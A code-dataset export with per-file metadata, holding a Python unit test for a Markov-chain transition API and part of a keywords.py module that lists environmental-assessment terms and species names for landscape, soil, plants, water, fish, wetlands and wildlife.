hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1bf46aaa6ab9e14cc4a7054440dee43e7bc7fa71
| 1,728
|
py
|
Python
|
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
from chai import Chai
from markhov_chain import MarkhovChain
class ApiTests(Chai):
    """Exercises the transition-counting API of MarkhovChain.

    Each test drives add_transition/remove_transition and then checks the
    internal counts via _transition_dump(). Note: bare assertEqual is the
    Chai framework's injected assertion helper, not a typo.
    """

    def setUp(self):
        super(ApiTests, self).setUp()
        # Fresh chain per test so counts never leak between cases.
        self.mc = MarkhovChain()

    def test_add_transition(self):
        # Repeated additions of the same edge accumulate its count.
        for src, dst in [("A", "B"), ("A", "B"), ("A", "B"),
                         ("B", "A"), ("B", "C"), ("C", "A")]:
            self.mc.add_transition(src, dst)
        expected = {
            'A': {'B': 3},
            'B': {'A': 1, 'C': 1},
            'C': {'A': 1}
        }
        assertEqual(self.mc._transition_dump(), expected)

    def test_remove_transition_singles(self):
        for src, dst in [("A", "B"), ("A", "B"), ("A", "B"),
                         ("B", "A"), ("B", "C"), ("C", "A")]:
            self.mc.add_transition(src, dst)
        # One occurrence removed per call; the second ("B", "A") removal
        # targets an edge already at zero — the test expects it tolerated.
        for src, dst in [("A", "B"), ("B", "A"), ("B", "A"), ("C", "A")]:
            self.mc.remove_transition(src, dst)
        expected = {
            'A': {'B': 2},
            'B': {'C': 1}
        }
        assertEqual(self.mc._transition_dump(), expected)

    def test_remove_transition_all(self):
        for src, dst in [("A", "B"), ("A", "B"), ("A", "B"),
                         ("B", "A"), ("B", "C"), ("B", "C"),
                         ("B", "C"), ("C", "A")]:
            self.mc.add_transition(src, dst)
        # all=True wipes every occurrence of an edge in one call; repeat
        # calls on an already-removed edge are expected to be no-ops.
        for src, dst in [("A", "B"), ("B", "A"), ("B", "A"),
                         ("B", "C"), ("B", "C")]:
            self.mc.remove_transition(src, dst, all=True)
        expected = {
            'C': {'A': 1}
        }
        assertEqual(self.mc._transition_dump(), expected)
| 21.873418
| 51
| 0.627894
| 264
| 1,728
| 3.943182
| 0.109848
| 0.190202
| 0.172911
| 0.365034
| 0.838617
| 0.838617
| 0.817483
| 0.817483
| 0.817483
| 0.775216
| 0
| 0.004775
| 0.15162
| 1,728
| 78
| 52
| 22.153846
| 0.705321
| 0
| 0
| 0.641509
| 0
| 0
| 0.041112
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.075472
| false
| 0
| 0.037736
| 0
| 0.132075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40391d15f07324eaadf5dcb52472979eb58426df
| 90,245
|
py
|
Python
|
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
import pickle
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import *
from nltk.tokenize import word_tokenize
# Newline-separated keyword list (one term per line) covering terrain,
# geotechnical, and weather vocabulary; presumably consumed downstream
# for keyword matching/labeling — TODO confirm against callers.
Landscape_terrain_and_weather = """Physical and Meteorological Environment
Physical Environment
Meteorological Environment
Precipitation
Snowfall
Wind
rain
Mean temperatures
Slope
Geotechnical
Slumping
Subsidence
Weather
Erosion
Ice
Permafrost
Climate trend
climate
water erosion
wind erosion
acid-generating rock
temperature
physical
meteorological
landslides
mudflows
slumping
subsidence
seismicity
flooding
migrating watercourses
eroding banks
extreme weather events
peak flow regime
ice jams
acid rock
climate variability
ground conditions
thaw
till
earthquake
avalanche
sloping
topography
elevation
terrain
landscape
weather
physiography
bedrock
geology
natural hazard"""
# Newline-separated keyword list of soil-related terms (includes some
# duplicates, e.g. "sand" twice, and acronyms like CCME/DVG/CRW);
# presumably used for keyword matching — TODO confirm against callers.
Soil = """Soil Productivity
Soil
Agriculture
Topsoil
Subsoil
Soil horizon
Drainage
Erosion
soil contamination
CCME
Canadian Council of Ministers of the Environment
Soil compaction
Soil structure
Soil classification
Soil handling
Containment
reclamation
thickness of horizon
tilth
grubbing
soil quality
salinity
sediments
rocks
minerals
sand
chernozem
DVG
Dunvargan
calcareous
CRW
sand
sandy
Glaciofluvial
boulders
gravel
silt
clay
stone
stoniness"""
Plants = """Vegetation
Plant
planting
Rare plant
Boreal
Grassland
Prairie
Forest
forested
Clearing
plant community
orchid
orchard
Weeds
Invasive species
invasive plants
Seed mix
Herbicide
Tree
leaf
branch
Growth
Old growth
Biodiversity
forestry
clubroot
wood
spruce
fir
birch
pine
aspen
tamarack
willow
beech
maple
black walnut
hickory
oak
redcedar
hemlock
Douglas-fir
genus
agricultural
root
seed
mulcher
mulch
bentgrass
sedge
carex
wood
moss
bulrush
oatgrass
mannagrass
flower
androgynum
Aulacomnium
undulatum
Atrichum
wheatgrass
parviflora
luzula
crawfordii
Achnatherum
needlegrass
eleocharis
reedgrass
calamagrostis
latifolia
Elymus
grain
wildrye
meadow
speargrass
shrub
chokecherry
Gattinger\'s Agalinis
Agalinis gattingeri
Rough Agalinis
Agalinis aspera
Skinner\'s Agalinis
Agalinis skinneriana
Scarlet Ammannia
Ammannia robusta
Short-rayed Alkali Aster
Symphyotrichum frondosum
Eastern Mountain Avens
Geum peckii
Deltoid Balsamroot
Balsamorhiza deltoidea
Tall Beakrush
Rhynchospora macrostachya
Cherry Birch
Betula lenta
Bluehearts
Buchnera americana
Fernald\'s Braya
Braya fernaldii
Hairy Braya
Braya pilosa
Long\'s Braya
Braya longii
Tall Bugbane
Actaea elata
Bashful Bulrush
Trichophorum planifolium
Slender Bush-clover
Lespedeza virginica
California Buttercup
Ranunculus californicus
Water-plantain Buttercup
Ranunculus alismifolius
Butternut
Juglans cinerea
Eastern Prickly Pear Cactus
Opuntia humifusa
Spalding\'s Campion
Silene spaldingii
Coastal Scouler\'s Catchfly
Silene scouleri grandis
Muhlenberg\'s Centaury
Centaurium muehlenbergii
American Chestnut
Castanea dentata
Colicroot
Aletris farinosa
Slender Collomia
Collomia tenella
American Columbo
Frasera caroliniensis
Pink Coreopsis
Coreopsis rosea
Eastern Flowering Dogwood
Cornus florida
Contorted-pod Evening-primrose
Camissonia contorta
Southern Maidenhair Fern
Adiantum capillus-veneris
Eastern Prairie Fringed-orchid
Platanthera leucophaea
Western Prairie Fringed-orchid
Platanthera praeclara
Plymouth Gentian
Sabatia kennedyana
White Prairie Gentian
Gentiana alba
American Ginseng
Panax quinquefolius
Virginia Goat\'s-rue
Tephrosia virginiana
Showy Goldenrod
Solidago speciosa
Rayless Goldfields
Lasthenia glaberrima
Forked Three-awned Grass
Aristida basiramea
Fascicled Ironweed
Vernonia fasciculata
Tweedy\'s Lewisia
Lewisiopsis tweedyi
Small-flowered Lipocarpha
Lipocarpha micrantha
Seaside Birds-foot Lotus
Lotus formosissimus
Furbish\'s Lousewort
Pedicularis furbishiae
Dense-flowered Lupine
Lupinus densiflorus
Prairie Lupine
Lupinus lepidus
Streambank Lupine
Lupinus rivularis
Virginia Mallow
Sida hermaphrodita
White Meconella
Meconella oregana
Coast Microseris
Microseris bigelovii
Pink Milkwort
Polygala incarnata
Hoary Mountain-mint
Pycnanthemum incanum
Red Mulberry
Morus rubra
Phantom Orchid
Cephalanthera austiniae
Bearded Owl-clover
Triphysaria versicolor
Grand Coulee Owl-clover
Orthocarpus barbatus
Rosy Owl-clover
Orthocarpus bracteosus
Victoria\'s Owl-clover
Castilleja victoriae
Golden Paintbrush
Castilleja levisecta
Branched Phacelia
Phacelia ramosissima
Whitebark Pine
Pinus albicaulis
Heart-leaved Plantain
Plantago cordata
Large Whorled Pogonia
Isotria verticillata
Nodding Pogonia
Triphora trianthophora
Small Whorled Pogonia
Isotria medeoloides
Ogden\'s Pondweed
Potamogeton ogdenii
Fragrant Popcornflower
Plagiobothrys figuratus
Stoloniferous Pussytoes
Antennaria flagellaris
Engelmann\'s Quillwort
Isoetes engelmannii
Quebec Rockcress
Boechera quebecensis
Kellogg\'s Rush
Juncus kelloggii
Pink Sand-verbena
Abronia umbellata
Small-flowered Sand-verbena
Tripterocalyx micranthus
Dwarf Sandwort
Minuartia pusilla
False Hop Sedge
Carex lupuliformis
Foothill Sedge
Carex tumulicola
Juniper Sedge
Carex juniperorum
Lindley\'s False Silverpuffs
Uropappus lindleyi
Brook Spike-primrose
Epilobium torreyi
Dense Spike-primrose
Epilobium densiflorum
Bent Spike-rush
Eleocharis geniculata
Bent Spike-rush
Eleocharis geniculata
Horsetail Spike-rush
Eleocharis equisetoides
Thread-leaved Sundew
Drosera filiformis
Small-flowered Tonella
Tonella tenella
Toothcup
Rotala ramosior
Cucumber Tree
Magnolia acuminata
Bog Bird\'s-foot Trefoil
Lotus pinnatus
Drooping Trillium
Trillium flexipes
Howell\'s Triteleia
Triteleia howellii
Bird\'s-foot Violet
Viola pedata
Yellow Montane Violet praemorsa
praemorsa
Viola praemorsa ssp. praemorsa
Barrens Willow
Salix jejuna
Spotted Wintergreen
Chimaphila maculata
Wood-poppy
Stylophorum diphyllum
Tall Woolly-heads
Psilocarphus elatior
Dwarf Woolly-heads
Psilocarphus brevissimus
Batwing Vinyl Lichen
Leptogium platynum
Boreal Felt Lichen
Erioderma pedicellatum
Pale-bellied Frost Lichen
Physconia subpallida
Seaside Centipede Lichen
Heterodermia sitchensis
Vole Ears Lichen
Rusty Cord-moss
Entosthodon rubiginosus
Acuteleaf Small Limestone Moss
Seligeria acutifolia
Margined Streamside Moss
Scouleria marginata
Nugget Moss
Microbryum vlassovii
Poor Pocket Moss
Fissidens pauperculus
Rigid Apple Moss
Bartramia stricta
Roell\'s Brotherella Moss
Brotherella roellii
Silver Hair Moss
Fabronia pusilla
Griscom’s Arnica
Arnica griscomii ssp. griscomii
Anticosti Aster
Symphyotrichum anticostense
Gulf of St. Lawrence Aster
Symphyotrichum laurentianum
Western Silvery Aster
Symphyotrichum sericeum
White Wood Aster
Eurybia divaricata
Willowleaf Aster
Symphyotrichum praealtum
Eastern Baccharis
Baccharis halimifolia
Branched Bartonia
Bartonia paniculata ssp. paniculata
Dense Blazing Star
Liatris spicata
Kentucky Coffee-tree
Gymnocladus dioicus
Tiny Cryptantha
Cryptantha minima
Lakeside Daisy
Hymenoxys herbacea
Deerberry
Vaccinium stamineum
Gray\'s Desert-parsley
Lomatium grayi
Lemmon\'s Holly Fern
Polystichum lemmonii
Mountain Holly Fern
Polystichum scopulinum
Victorin\'s Gentian
Gentianopsis virgata ssp. victorinii
Showy Goldenrod
Solidago speciosa
Goldenseal
Hydrastis canadensis
Smooth Goosefoot
Chenopodium subglabrum
Round-leaved Greenbrier
Smilax rotundifolia
Dwarf Hackberry
Celtis tenuifolia
Wild Hyacinth
Camassia scilloides
Van Brunt\'s Jacob’s-ladder
Polemonium vanbruntiae
Small White Lady\'s-slipper
Cypripedium candidum
Hare-footed Locoweed
Oxytropis lagopus
Macoun\'s Meadowfoam
Limnanthes macounii
Mexican Mosquito-fern
Azolla mexicana
Slender Mouse-ear-cress
Halimolobos virgata
Cliff Paintbrush
Castilleja rupicola
Sweet Pepperbush
Clethra alnifolia
Showy Phlox
Phlox speciosa ssp. occidentalis
Slender Popcornflower
Plagiobothrys tenellus
Bolander\'s Quillwort
Isoetes bolanderi
False Rue-anemone
Enemion biternatum
Bear\'s-foot Sanicle
Sanicula arctopoides
Purple Sanicle
Sanicula bipinnatifida
Soapweed
Yucca glauca
Western Spiderwort
Tradescantia occidentalis
Hill\'s Thistle
Cirsium hillii
Toothcup
Rotala ramosior
Purple Twayblade
Liparis liliifolia
American Water-willow
Justicia americana
Green-scaled Willow
Salix chlorolepis
Blunt-lobed Woodsia
Woodsia obtusa
Seaside Bone
Hypogymnia heterophylla
Black-foam Lichen
Anzia colpodes
Crumpled Tarpaper Lichen
Collema coniophilum
Wrinkled Shingle Lichen
Pannaria lurida
Eastern Waterfan
Peltigera hydrothyria
Porsild\'s Bryum
Mielichhoferia macrocarpa
Alkaline Wing-nerved Moss
Pterygoneurum kozlovii
Haller\'s Apple Moss
Bartramia halleriana
Spoon-leaved Moss
Bryoandersonia illecebra
Blue Ash
Fraxinus quadrangulata
Crooked-stem Aster
Symphyotrichum prenanthoides
Nahanni Aster
Symphyotrichum nahanniense
White-top Aster
Sericocarpus rigidus
Vancouver Island Beggarticks
Bidens amplissima
Western Blue Flag
Iris missouriensis
Buffalograss
Bouteloua dactyloides
American Hart\'s-tongue Fern
Asplenium scolopendrium
Coastal Wood Fern
Dryopteris arguta
Goldencrest
Lophiola aurea
Houghton\'s Goldenrod
Solidago houghtonii
Riddell\'s Goldenrod
Solidago riddellii
Mackenzie Hairgrass
Deschampsia mackenzieana
Common Hoptree
Ptelea trifoliata
Tuberous Indian-plantain
Arnoglossum plantagineum
Dwarf Lake Iris
Iris lacustris
Eastern Lilaeopsis
Lilaeopsis chinensis
Lyall\'s Mariposa Lily
Calochortus lyallii
Fernald\'s Milk-vetch
Astragalus robbinsii var. fernaldii
Water Pennywort
Hydrocotyle umbellata
Beach Pinweed
Lechea maritima
Yukon Podistera
Podistera yukonensis
Hill\'s Pondweed
Potamogeton hillii
Hairy Prairie-clover
Dalea villosa
Prototype Quillwort
Isoetes prototypus
Redroot
Lachnanthes caroliniana
Climbing Prairie Rose
Rosa setigera
Swamp Rose-mallow
Hibiscus moscheutos
New Jersey Rush
Juncus caesariensis
Spiked Saxifrage
Micranthes spicata
Baikal Sedge
Carex sabulosa
Tubercled Spike-rush
Eleocharis tuberculosa
Floccose Tansy
Tanacetum huronense var. floccosum
Pitcher\'s Thistle
Cirsium pitcheri
Athabasca Thrift
Armeria maritima interior
Victorin\'s Water-hemlock
Cicuta maculata var. victorinii
Yukon Wild Buckwheat
Eriogonum flavum var. aquilinum
Felt-leaf Willow
Salix silicicola
Sand-dune Short-capsuled Willow
Salix brachycarpa var. psammophila
Turnor\'s Willow
Salix turnorii
Dwarf Woolly-heads
Psilocarphus brevissimus
Large-headed Woolly Yarrow
Achillea millefolium var. megacephalum
Banded Mosses
Cord-moss
Entosthodon fascicularis
Columbian Carpet Moss
Bryoerythrophyllum columbianum
Twisted Oak Moss
Syntrichia laevipila
Tiny Tassel
Crossidium seriatum
Frosted Lichens
Glass-whiskers
Sclerophora peronella
Flooded Jellyskin
Leptogium rivulare
Blue Felt Lichen
Degelia plumbea
Boreal Felt Lichen
Erioderma pedicallatum
Cryptic Paw Lichen
Nephroma occultum
Oldgrowth Specklebelly Lichen
Pseudocyphellaria rainierensis
Peacock Vinyl Lichen
Leptogium polycarpum
Mountain Crab-eye
Acroscyphus sphaerophoroides
Western Waterfan
Peltigera gowardii"""
# Newline-separated keyword list of water quality/quantity terms.
# NOTE(review): contains the apparent misspelling "acquatics" alongside
# "aquatics" — likely intentional to catch typos in matched text, but
# worth confirming with the original authors.
Water = """Water Quality and Quantity
Water
waterbody
water body
watercourse
evaporation
transpiration
Surface water
Ground water
Runoff
Contamination
contaminant
Water use
Hydrologic
hydrological
hydro
hydrostatic
salinity
blasting
Withdrawal
Flow
Peak
Basin
Inter-basin
Water Quality
Water quality testing
Water table
Containment
Sediment
sewer
waste
wastewater
biosolids
sludge
septage
groundwater
groundwater-related
aquifers
streamflow
aquatics
acquatics
river
hydrometric
watershed
waterfall
sea
ocean
lake
pond
fjords
wadis
runs
reservoir
lagoon
bay
harbor
well
well-water
surface-water
surfacewater
hot spring
creek
tidal
subtidal
mercury
water contamination"""
Fish = """Fish
Fish Habitat
fish-bearing
fisheries
Fisheries and Oceans Canada
mercury
water contamination
deleterious
DFO
Fisheries and Oceans
Local fisheries
Trout
Fisheries Act
Offsetting
Instream work
in-stream work
Restricted activity period
Fish-bearing water body
Riparian
acquatic
Aquatic
Aquatic invasive species
Spawning
Fry
fingerling
alevin
chlorine
chlorinated
Sport fishery
Spawning deterrent
spawning period
Stream
River
In-stream
instream
Wetted width
substrate
salmon
oncorhynchus
walleye
pike
crappie
redhorse
pumpkinseed fish
bowfin
bass
catfish
sunfish
bluegill
spotted gar
muskellunge
ruffe
yellow perch
shiner
sucker
whitefish
cisco
sea
ocean
lake
pond
bay
subtidal
Striped Bass
Morone saxatilis
Silver Chub
Macrhybopsis storeriana
Lake Chubsucker
Erimyzon sucetta
Shortnose Cisco
Coregonus reighardi
Spring Cisco
Coregonus sp.
Nooksack Dace
Rhinichthys cataractae ssp.
Redside Dace
Clinostomus elongatus
Speckled Dace
Rhinichthys osculus
Channel Darter
Percina copelandi
Channel Darter
Percina copelandi
Spotted Gar
Lepisosteus oculatus
Western Brook Lamprey
Lampetra richardsoni
Northern Madtom
Noturus stigmosus
Copper Redhorse
Moxostoma hubbsi
Atlantic Salmon
Salmo salar
Basking Shark
Cetorhinus maximus
White Shark
Carcharodon carcharias
Carmine Shiner
Notropis percobromus
Rainbow Smelt
Osmerus mordax
Rainbow Smelt
Osmerus mordax
Enos Lake Benthic Threespine Stickleback
Gasterosteus aculeatus
Enos Lake Limnetic Threespine Stickleback
Misty Lake Lentic Threespine Stickleback
Misty Lake Lotic Threespine Stickleback
Vananda Creek Benthic Threespine Stickleback
Vananda Creek Limnetic Threespine Stickleback
Gasterosteus aculeatus
White Sturgeon
Acipenser transmontanus
Rainbow Trout
Oncorhynchus mykiss
Atlantic Whitefish
Coregonus huntsmani
Eastern Sand Darter
Ammocrypta pellucida
Eastern Sand Darter
Ammocrypta pellucida
Vancouver Lamprey
Entosphenus macrostomus
Plains Minnow
Hybognathus placitus
Pugnose Minnow
Opsopoeodus emiliae
Western Silvery Minnow
Hybognathus argyritis
Black Redhorse
Moxostoma duquesnei
Coastrange Sculpin
Cottus aleuticus
Rocky Mountain Sculpin
Cottus sp.
Pugnose Shiner
Notropis anogenus
Silver Shiner
Notropis photogenis
Spotted Wolffish
Anarhichas minor
Mountain Sucker
Catostomus platyrhynchus
Salish Sucker
Catostomus sp. cf. catostomus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Northern Wolffish
Anarhichas denticulatus
Bigmouth Buffalo
Ictiobus cyprinellus
Channel Darter
Percina copelandi
Dolly Varden
Salvelinus malma malma
Banded Killifish
Fundulus diaphanus
Upper Great Lakes Kiyi
Coregonus kiyi kiyi
Northern Brook Lamprey
Ichthyomyzon fossor
Silver Lamprey
Ichthyomyzon unicuspis
Cutlip Minnow
Exoglossum maxillingua
Grass Pickerel
Esox americanus vermiculatus
River Redhorse
Moxostoma carinatum
Rougheye Rockfish type I
Sebastes sp. type I
Rougheye Rockfish type II
Sebastes sp. type II
Yelloweye Rockfish
Sebastes ruberrimus
Columbia Sculpin
Cottus hubbsi
Deepwater Sculpin
Myoxocephalus thompsonii
Rocky Mountain Sculpin
Cottus sp.
Shorthead Sculpin
Cottus confusus
Bluntnose Sixgill Shark
Hexanchus griseus
Bridle Shiner
Notropis bifrenatus
Giant Threespine Stickleback
Gasterosteus aculeatus
Unarmoured Threespine Stickleback
Gasterosteus aculeatus
Green Sturgeon
Acipenser medirostris
Lake Sturgeon
Acipenser fulvescens
Shortnose Sturgeon
Acipenser brevirostrum
Mountain Sucker
Catostomus platyrhynchus
Spotted Sucker
Minytrema melanops
Northern Sunfish
Lepomis peltastes
Longspine Thornyhead
Sebastolobus altivelis
Tope
Galeorhinus galeus
Blackstripe Topminnow
Fundulus notatus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Warmouth
Lepomis gulosus
Atlantic Wolffish
Anarhichas lupus"""
# Newline-separated keyword list of wetland classification terms;
# presumably consumed downstream for keyword matching/labeling —
# TODO confirm against callers.
Wetlands = """Wetlands
Class (wetland class)
wetland
Bog
Fen
Marsh
Swamp
Shallow water
Wetland function
Hydrological function
Drainage area
Canadian wetland classification system
Federal policy on wetland conservation
Wetland monitoring
water recharge
potholes
ponds
peatbogs
mires
mangrove forest
carr
pocosin
floodplains
vernal pool
baygall
slough"""
Wildlife = """Wildlife and Wildlife Habitat
wildlife
wildlife habitat
nocturnal
bat trees
hibernation
migratory birds
migratory bird sanctuary
MBCA
migratory birds convention act
Nesting
foraging
Restricted activity period
Mammal
Ungulate
Amphibian
Reptile
Breeding
eggs
Den
migration
staging
movement corridors
forest interior
denning
Wintering
overwintering
national park
national wildlife reserve
national wildlife area
world biosphere reserve
Hibernaculum
hibernacula
Riparian habitat
Old growth habitat
Sensitive period
Sensory disturbance
Mortality
Mortality risk
Habitat alteration
Habitat loss
Habitat destruction
Range
Population
Distribution
Sanctuary
sanctuaries
Important Bird Area
Bat
caribou
bird
goose
swans
frogs
toads
salamanders
newts
caecilians
furbearing
reptile
invertebrate
rattlesnake
snake
waterbird
bear
moose
bat
owl
beaver
moose
polar bear
bison
puffin
lynx
deer
wolf
reindeer
bear
cougar
goose
coyote
wolverine
raccoon
elk
crane
porcupine
fox
hare
loon
marmot
rabbit
bobcat
owl
rattlesnake
insect
bug
weasel
otter
skunk
mollusk
mollusc
reptile
amphibian
mineral lick
minerallick
hunting
trapping
American Badger jacksoni
jaksoni
Badger
Taxidea taxus jacksoni
American Badger jeffersonii
Taxidea taxus jeffersonii
American Badger jeffersonii
jeffersonii
Taxidea taxus jeffersonii
Tri-coloured Bat
Perimyotis subflavus
Peary Caribou
Caribou
Rangifer tarandus pearyi
Woodland Caribou
Rangifer tarandus caribou
Ord\'s Kangaroo Rat
Dipodomys ordii
Vancouver Island Marmot
Marmota vancouverensis
Townsend\'s Mole
Scapanus townsendii
Western Harvest Mouse dychei
dychei
Reithrodontomys megalotis dychei
Little Brown Myotis
Myotis
Myotis lucifugus
Northern Myotis
Myotis septentrionalis
Northern Bobwhite
Colinus virginianus
Yellow-breasted Chat auricollis
auricollis
Icteria virens auricollis
Yellow-breasted Chat virens
virens
Icteria virens virens
Whooping Crane
Grus americana
Eskimo Curlew
Numenius borealis
Acadian Flycatcher
Empidonax virescens
Horned Grebe
Podiceps auritus
Ivory Gull
Pagophila eburnea
Red Knot rufa
rufa
Calidris canutus rufa
Streaked Horned Lark
Eremophila alpestris strigata
Barn Owl
Tyto alba
Burrowing Owl
Athene cunicularia
Spotted Owl caurina
caurina
Strix occidentalis caurina
Mountain Plover
Charadrius montanus
Piping Plover circumcinctus
circuinctus
Charadrius melodus circumcinctus
Piping Plover melodus
melodus
Charadrius melodus melodus
King Rail
Rallus elegans
Greater Sage-Grouse urophasianus subspecies
Centrocercus urophasianus urophasianus
Williamson\'s Sapsucker
Sphyrapicus thyroideus
Pink-footed Shearwater
Ardenna creatopus
Loggerhead Shrike migrans
migrans
Lanius ludovicianus migrans
Coastal Vesper Sparrow
Pooecetes gramineus affinis
Henslow\'s Sparrow
Ammodramus henslowii
Black Swift
Cypseloides niger
Roseate Tern
Sterna dougallii
Sage Thrasher
Oreoscoptes montanus
Cerulean Warbler
Setophaga cerulea
Kirtland\'s Warbler
Dendroica kirtlandii
Prothonotary Warbler
Protonotaria citrea
Red-headed Woodpecker
Melanerpes erythrocephalus
White-headed Woodpecker
Picoides albolarvatus
Cricket Frog
Acris blanchardi
Northern Leopard Frog
Lithobates pipiens
Oregon Spotted Frog
Rana pretiosa
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Eastern Tiger Salamander
Ambystoma tigrinum
Jefferson Salamander
Ambystoma jeffersonianum
Northern Dusky Salamander
Desmognathus fuscus
Small-mouthed Salamander
Ambystoma texanum
Western Tiger Salamander
Ambystoma mavortium
Fowler\'s Toad
Anaxyrus fowleri
Eastern Reptiles
Foxsnake
Pantherophis gloydi
Eastern Foxsnake
Pantherophis gloydi
Butler\'s Gartersnake
Thamnophis butleri
Greater Short-horned Lizard
